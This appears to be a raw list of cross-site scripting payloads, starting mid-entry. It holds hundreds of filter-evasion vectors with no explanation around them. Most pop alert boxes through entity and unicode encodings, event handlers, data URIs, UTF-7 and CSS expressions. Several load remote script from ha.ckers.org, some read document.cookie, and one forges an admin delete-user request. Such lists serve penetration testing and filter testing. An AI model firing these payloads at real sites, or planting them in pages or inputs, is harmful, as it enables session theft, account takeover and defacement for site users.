src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> +<svg><script ?>alert(1) +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> +<img src=`xx:xx`onerror=alert(1)> +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> +<math><a xlink:href="//jsfiddle.net/t846h/">click +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> +<svg contentScriptType=text/vbs><script>MsgBox+1 +<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a +<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> +<script>+-+-1-+-+alert(1)</script> +<body/onload=&lt;!--&gt;&#10alert(1)> +<script itworksinallbrowsers>/*<script* */alert(1)</script +<img src ?itworksonchrome?\/onerror = alert(1) +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<div/onmouseover='alert(1)'> style="x:"> +<--`<img/src=` onerror=alert(1)> --!> + <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> +<div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> +"><img src=x onerror=window.open('https://www.google.com/');> +<form><button formaction=javascript&colon;alert(1)>CLICKME +<math><a xlink:href="//jsfiddle.net/t846h/">click +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> +<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> +‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=”jav ascript:alert(‘XSS’);”> +<IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”> +<<SCRIPT>alert(“XSS”);//<</SCRIPT> +%253cscript%253ealert(1)%253c/script%253e +“><s”%2b”cript>alert(document.cookie)</script> +foo<script>alert(1)</script> +<scr<script>ipt>alert(1)</scr</script>ipt> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<BODY BACKGROUND=”javascript:alert(‘XSS’)”> +<BODY ONLOAD=alert(‘XSS’)> +<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”> +<IMG SRC=”javascript:alert(‘XSS’)” +<iframe src=http://ha.ckers.org/scriptlet.html < +javascript:alert("hellox worldss") +<img src="javascript:alert('XSS');"> +<img src=javascript:alert(&quot;XSS&quot;)> +<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search +<script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 +<script>alert("XSS");</script>&search=1 +0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search +<h1><font color=blue>hellox worldss</h1> +<BODY ONLOAD=alert('hellox worldss')> +<input onfocus=write(XSS) autofocus> +<input onblur=write(XSS) autofocus><input autofocus> +<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form><button formaction="javascript:alert(XSS)">lol +<!--<img src="--><img src=x onerror=alert(XSS)//"> +<![><img src="]><img src=x onerror=alert(XSS)//"> +<style><img src="</style><img src=x onerror=alert(XSS)//"> +<? foo="><script>alert(1)</script>"> +<! foo="><script>alert(1)</script>"> +</ foo="><script>alert(1)</script>"> +<? foo="><x foo='?><script>alert(1)</script>'>"> +<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>"> +<% foo><x foo="%><script>alert(123)</script>"> +<div style="font-family:'foo&#10;;color:red;';">LOL +LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style> +<script>({0:#0=alert/#0#/#0#(0)})</script> +<svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg> +&lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt; +\\";alert('XSS');// +&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt; +&lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&#058;alert('XSS');\"&gt; +&lt;BODY BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; +&lt;BODY ONLOAD=alert('XSS')&gt; +&lt;IMG DYNSRC=\"javascript&#058;alert('XSS')\"&gt; +&lt;IMG LOWSRC=\"javascript&#058;alert('XSS')\"&gt; +&lt;BGSOUND SRC=\"javascript&#058;alert('XSS');\"&gt; +&lt;BR SIZE=\"&{alert('XSS')}\"&gt; +&lt;LAYER SRC=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/LAYER&gt; +&lt;LINK REL=\"stylesheet\" HREF=\"javascript&#058;alert('XSS');\"&gt; +&lt;LINK REL=\"stylesheet\" HREF=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\"&gt; +&lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt; +&lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\"&gt; +&lt;STYLE&gt;BODY{-moz-binding&#58;url(\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\")}&lt;/STYLE&gt; +&lt;XSS STYLE=\"behavior&#58; url(xss&#46;htc);\"&gt; +&lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS +&lt;IMG SRC='vbscript&#058;msgbox(\"XSS\")'&gt; +&lt;IMG SRC=\"mocha&#58;&#91;code&#93;\"&gt; +&lt;IMG SRC=\"livescript&#058;&#91;code&#93;\"&gt; +žscriptualert(EXSSE)ž/scriptu +&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&#058;alert('XSS');\"&gt; +&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt; +&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\" +&lt;IFRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/IFRAME&gt; +&lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/FRAMESET&gt; +&lt;TABLE BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; +&lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; +&lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt; +&lt;DIV STYLE=\"background-image&#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029'\0029\"&gt; +&lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt; +&lt;DIV STYLE=\"width&#58; expression(alert('XSS'));\"&gt; +&lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;alert(\"XSS\")';&lt;/STYLE&gt; +&lt;IMG STYLE=\"xss&#58;expr/*XSS*/ession(alert('XSS'))\"&gt; +&lt;XSS STYLE=\"xss&#58;expression(alert('XSS'))\"&gt; +exp/*&lt;A STYLE='no\xss&#58;noxss(\"*//*\"); +xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'&gt; +&lt;STYLE TYPE=\"text/javascript\"&gt;alert('XSS');&lt;/STYLE&gt; +&lt;STYLE&gt;&#46;XSS{background-image&#58;url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt; +&lt;STYLE type=\"text/css\"&gt;BODY{background&#58;url(\"javascript&#058;alert('XSS')\")}&lt;/STYLE&gt; +&lt;!--&#91;if gte IE 4&#93;&gt; +&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt; +&lt;!&#91;endif&#93;--&gt; +&lt;BASE HREF=\"javascript&#058;alert('XSS');//\"&gt; +&lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/OBJECT&gt; +&lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJECT&gt; +&lt;EMBED SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt; +&lt;EMBED SRC=\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt; +a=\"get\"; +b=\"URL(\\"\"; +c=\"javascript&#058;\"; +d=\"alert('XSS');\\")\"; +eval(a+b+c+d); +&lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\"xss\" implementation=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt; +&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert('XSS');\"&gt;&#93;&#93;&gt; +&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt; +&lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript&#58;alert('XSS')\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt; +&lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&gt;&lt;/SPAN&gt; +&lt;XML SRC=\"xsstest&#46;xml\" ID=I&gt;&lt;/XML&gt; +&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt; +&lt;HTML&gt;&lt;BODY&gt; +&lt;?xml&#58;namespace prefix=\"t\" ns=\"urn&#58;schemas-microsoft-com&#58;time\"&gt; +&lt;?import namespace=\"t\" implementation=\"#default#time2\"&gt; +&lt;t&#58;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"&gt; +&lt;/BODY&gt;&lt;/HTML&gt; +&lt;SCRIPT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\"&gt;&lt;/SCRIPT&gt; +&lt;!--#exec cmd=\"/bin/echo '&lt;SCR'\"--&gt;&lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;'\"--&gt; +&lt;? echo('&lt;SCR)'; +echo('IPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;'); ?&gt; +&lt;IMG SRC=\"http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\"&gt; +Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser +&lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\"&gt; +&lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +&lt;SCRIPT a=\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT =\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=\"&gt;\" '' SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT \"a='&gt;'\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=`&gt;` SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=\"&gt;'&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT&gt;document&#46;write(\"&lt;SCRI\");&lt;/SCRIPT&gt;PT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;A HREF=\"http&#58;//66&#46;102&#46;7&#46;147/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//1113982867/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//0102&#46;0146&#46;0007&#46;00000223/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"//www&#46;google&#46;com/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"//google\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//ha&#46;ckers&#46;org@google\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//google&#58;ha&#46;ckers&#46;org\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//google&#46;com/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//www&#46;google&#46;com&#46;/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\"&gt;XSS&lt;/A&gt; +&lt; +%3C +&lt +&lt; +&LT +&LT; +&#60 +&#060 +&#0060 +&#00060 +&#000060 +&#0000060 +&lt; +&#x3c +&#x03c +&#x003c +&#x0003c +&#x00003c +&#x000003c +&#x3c; +&#x03c; +&#x003c; +&#x0003c; +&#x00003c; +&#x000003c; +&#X3c +&#X03c +&#X003c +&#X0003c +&#X00003c +&#X000003c +&#X3c; +&#X03c; +&#X003c; +&#X0003c; +&#X00003c; +&#X000003c; +&#x3C +&#x03C +&#x003C +&#x0003C +&#x00003C +&#x000003C +&#x3C; +&#x03C; +&#x003C; +&#x0003C; +&#x00003C; +&#x000003C; +&#X3C +&#X03C +&#X003C +&#X0003C +&#X00003C +&#X000003C +&#X3C; +&#X03C; +&#X003C; +&#X0003C; +&#X00003C; +&#X000003C; +\x3c +\x3C +\u003c +\u003C +&lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt; +&lt;IMG SRC=\"javascript&#058;alert('XSS')\" +&lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt; +&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt; +&lt;&lt;SCRIPT&gt;alert(\"XSS\");//&lt;&lt;/SCRIPT&gt; +&lt;SCRIPT/SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(\"XSS\")&gt; +&lt;SCRIPT/XSS SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;IMG SRC=\" javascript&#058;alert('XSS');\"&gt; +perl -e 'print \"&lt;SCR\0IPT&gt;alert(\\"XSS\\")&lt;/SCR\0IPT&gt;\";' &gt; out +perl -e 'print \"&lt;IMG SRC=java\0script&#058;alert(\\"XSS\\")&gt;\";' &gt; out +&lt;IMG SRC=\"jav&#x0D;ascript&#058;alert('XSS');\"&gt; +&lt;IMG SRC=\"jav&#x0A;ascript&#058;alert('XSS');\"&gt; +&lt;IMG SRC=\"jav&#x09;ascript&#058;alert('XSS');\"&gt; +&lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt; +&lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt; +&lt;IMG SRC=javascript&#058;alert('XSS')&gt; +&lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt; +&lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;\"&gt; +&lt;IMG SRC=`javascript&#058;alert(\"RSnake says, 'XSS'\")`&gt; +&lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt; +&lt;IMG SRC=JaVaScRiPt&#058;alert('XSS')&gt; +&lt;IMG SRC=javascript&#058;alert('XSS')&gt; +&lt;IMG SRC=\"javascript&#058;alert('XSS');\"&gt; +&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt; +'';!--\"&lt;XSS&gt;=&{()} +';alert(String&#46;fromCharCode(88,83,83))//\';alert(String&#46;fromCharCode(88,83,83))//\";alert(String&#46;fromCharCode(88,83,83))//\\";alert(String&#46;fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt; +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascrscriptipt:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT>a=/XSS/alert(a.source)</SCRIPT> +\";alert('XSS');// +</TITLE><SCRIPT>alert("XSS");</SCRIPT> +¼script¾alert(¢XSS¢)¼/script¾ +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<TABLE><TD BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +<DIV STYLE="width: expression(alert('XSS'));"> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +<XSS STYLE="xss:expression(alert('XSS'))"> +exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> +<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> +a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e); +<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION +<form><button formaction="javascript:alert(123)">crosssitespt +<frameset onload=alert(123)> +<!--<img src="--><img src=x onerror=alert(123)//"> +<style><img src="</style><img src=x onerror=alert(123)//"> +<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> +<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> +<embed src="javascript:alert(1)"> +<? foo="><script>alert(1)</script>"> +<! foo="><script>alert(1)</script>"> +</ foo="><script>alert(1)</script>"> +<script>({0:#0=alert/#0#/#0#(123)})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script> +<script src="#">{alert(1)}</script>;1 +<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script> +<svg xmlns="#"><script>alert(1)</script></svg> +<svg onload="javascript:alert(123)" xmlns="#"></svg> +<iframe xmlns="#" src="javascript:alert(1)"></iframe> ++ADw-script+AD4-alert(document.location)+ADw-/script+AD4- +%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- ++ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- +%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- +%253cscript%253ealert(document.cookie)%253c/script%253e +“><s”%2b”cript>alert(document.cookie)</script> +“><ScRiPt>alert(document.cookie)</script> 